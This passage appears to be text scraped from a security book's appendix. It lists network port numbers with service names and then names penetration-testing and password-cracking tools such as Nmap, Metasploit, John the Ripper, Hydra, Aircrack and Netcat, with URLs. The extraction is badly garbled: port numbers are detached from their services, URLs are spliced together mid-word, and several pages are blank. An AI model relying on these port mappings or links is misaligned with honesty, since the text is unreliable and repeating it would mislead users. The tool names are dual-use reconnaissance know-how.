net Chat/Game Protocol Battle. control.net File Transfer Protocol Oracle iASControl Oracle OMS Dossier Server Indigo Home Server MySQL Cluster Manager OpenVPN Log Request Listener KAZAA VPNz DNS2Go Nessus Open Network Library eTrust Policy Compliance Microsoft Operations Manager JWalkServer WinJaServer Optical Domain Service Interconnect Password Policy GlobalView to Unix Shell Unix Shell to GlobalView Print Manager Network Log Server 147 1038 1045 1046 1052 1061 1085 1096 1114 1119 1120 1157 1159 1175 1176 1186 1194 1204 1214 1224 1227 1241 1258 1267 1270 1289 1290 1308 1333 1369 1370 1392 1393 .990 992 993 994 995 - FTP protocol. over TLS/SSL Telnet protocol over TLS/SSL IMAP4 protocol over TLS/SSL IRC protocol over TLS/SSL POP3 protocol over TLS/SSL Message Tracking Query Protocol Fingerprint Image Transfer Protocol WebFilter Remote Monitor Dynamic DNS Tools KIOSK Web Objects Common Name Resolution Protocol Oracle WebCache Listener Mini SQL Battle.

31498 1512 1525 1527 1529 1571 1689 1893 2029 2069 2164 2427 2439 2450 2451 2452 2463 2529 2533 2594 2679 2697 2703 2775 2811 2892 2926 2948 2949 3007 3043 3051 3088 3111 3119 - Microsoft SQL Microsoft SQL Sybase SQL Microsoft's Windows Internet Name Service Oracle Oracle Oracle Oracle Remote Data Base Firefox MSN messenger Microsoft SQL Server 7 Hot Standby Router Protocol Hot Standby Router Protocol IPv6 HTTP Event Port Dynamic DNS Version 3 Media Gateway Control Protocol Gateway SybaseDBSynch Netadmin Netchat SnifferClient Symbios Raid UTS FTP SnifferServer sData Base Server Sync Server SSL Oce SNMP Trap Port SMS CHAT SMPP GSI FTP SnifferData Mobile-File-DL WAP push WAP push secure Lotus Mail Tracking Agent Protocol Broadcast Routing Protocol Galaxy Server eXtensible Data Transfer Protocol Web Synchronous Services D2000 Kernel Port 148 .

11 WLANs WG IAPP Object Access Protocol Object Access Protocol over SSL XSS Server Port VPN Token Propagation Protocol TFTP over TLS World of Warcraft xxNETserver MS Firewall Control winShadow Host Discovery Dynamic Site System Anti-virus Application Management Port Dynamic Routing Information Protocol Terabase Apple VPN Server Reporting Protocol Network Security Service Remote Who Is Remote file access server Boundary traversal Network Scanner Tool FTP Simple Policy Control Protocol Simple Network Audio Protocol App Server .NETster Port Active API Server Port SuSE Meta PPPD XML NM over SSL WhiskerControl Ordinox Server MySQL Virtual Token SSL Port XSS Port WebMail/2 IEEE 802.3120 3126 3128 3185 3220 3233 3274 3306 3509 3510 3511 3517 3567 3568 3646 3694 3713 3724 3832 3847 3861 3932 3939 3949 4000 4112 4159 4321 4672 4678 4687 4751 4752 4848 5269 5353 5357 5358 5432 - D2000 Webserver Port Microsoft .Admin HTTP XMPP Server Connection Multicast DNS Web Services for Devices WS for Devices Secured PostgreSQL Database 149 .

SysInfo Service Protocol 11997 .WAP connectionless session service 9201 .Network Layer Signaling Transport Layer 7627 .OpenXDAS Wire Protocol 7677 .Sun App Server .SMC-HTTPS 7421 .CA eTrust Web Update Service 15740 .Sun Proxy Admin Service 8443 .FileNET Component Manager 33434 .Image Systems Network Services 150 .Netscape Enterprise Server Administration Server 32773 .Sun Web Server SSL Admin Service 9200 .SMC-HTTP 6789 .PCsync HTTPS 8473 .OpenMail Desk Gateway server 5757 .WAP secure connectionless session service 9595 .5755 .Sakura Script Transfer Protocol 8008 .Internet Backplane Protocol 6788 .Picture Transfer Protocol 26000 – Quake .Oracle Application Server HTTPS 7548 .HTTP Alternate 8081 .Matisse Port Monitor 7443 .Threat Information Distribution Protocol 7549 .WorldMailExpress 14414 .PCP server 48128 .Very Simple Ctrl Protocol 10000 .HTTPS 7743 .Backup Express Web Server 6622 .Sun Web Server Admin Service 8989 .Network Data Management Protocol 11967 .Ping Discovery Service 9598 .Multicast FTP 6714 .OpenMail X.HTTP Alternate 8080 .500 Directory Server 6122 .WAP session service 9202 .SOAP Service Port 7629 .Object Access Protocol Administration 8800 .Traceroute 44321 .Virtual Point to Point 8567 .

org - Retina - Wireshark - www.insecure.com/download_ethereal/ Nikto – 3200 http://www.wiretrip.Felipe Monizhttp://www.net/code/nikto.org/pages/info.asp Nessus UNIXwww.nessus.snort.com Snort exploitwww.com/retina Achilles .freebsd.shtml 151 .nstalker.HTTP/SSL Proxy www.html Stealth .eeye.org/nmap/ Whisker .org/ports/index.net/rfp (tools) - - Twwwscan/Arirang http://www.filehippo.cirt.Nmap .Rain Forest Puppy http://www.achilles.Network mapperhttp://www.org/dl/binaries/win32/ http://www.

ethereal. http://www.net Cain and Abel . UDP. TCPTCP/IP .sourceforge. Kismet wireless sniffer.ICMP.com/john/ Eraser .Windowswww.ie/eraser/download. TCPdump http://www.com 152 .it John the Ripper http://www.sourceforge.insecure.heidi.php Netcat - http://download.org/ Yersinia http://yersihia.openwall.Windowshttp://www.John the Ripper http://www.tgz http://netcat.oxid.openwall.org/stf/nc110.org/tools/ Hping .tcpdump.Fingerprint Ethereal .com/john/ p0f .net/ Metasploit Framework exploit http://metasploit.

XSS Telnet.stumbler.org/ HTTP fuzzer www.com/products/webinspect/toolkit.Windows- - http://www. Netfilter http://www.com/downloads/ AirCrack .html 153 . Dsniff - sniffer g/~dugsong/dsniff/ GFI LANguard .Windowswww.netfilter.net/ THC Hydra authentication -hydra/ THC Amap fingerprinting -amap/ Paros proxy proxy SQL injection. http head. traceroute.WEP/WPA Superscan .org/ ping.spidynamics.Windows-ng.gfi.PuTTY NetStumbler .

154 .

155 .

156 .

http://www.mn - Google 157 .google.

158 .

- - 159 .

Perl Python.- - ython. 160 .